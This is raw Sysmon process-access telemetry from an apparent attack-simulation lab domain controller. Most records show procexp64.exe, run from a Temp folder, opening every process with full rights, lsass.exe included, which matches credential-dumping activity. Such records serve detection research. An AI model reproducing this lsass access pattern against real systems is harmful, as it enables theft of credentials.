10341000x8000000000000000785574Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785573Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785572Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785571Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785570Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785569Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785568Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785567Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785566Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785565Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785564Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785563Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785562Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785561Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785560Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785559Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785558Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785557Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785556Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785555Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785554Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785553Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785552Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785551Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785550Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785549Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.127{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3228-6010-C0A2-00000000A301}1712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785548Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.127{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785547Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.127{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785546Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.127{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785545Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.127{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785544Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.127{732C744F-1517-600B-0500-00000000A301}640656C:\Windows\system32\csrss.exe{732C744F-3228-6010-C0A2-00000000A301}1712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000785543Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.127{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3228-6010-C0A2-00000000A301}1712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000785542Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:52.128{732C744F-3228-6010-C0A2-00000000A301}1712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000785690Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.580{732C744F-3229-6010-C2A2-00000000A301}63044376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785689Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:53.408{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3229-6010-C2A2-00000000A301}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785688Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 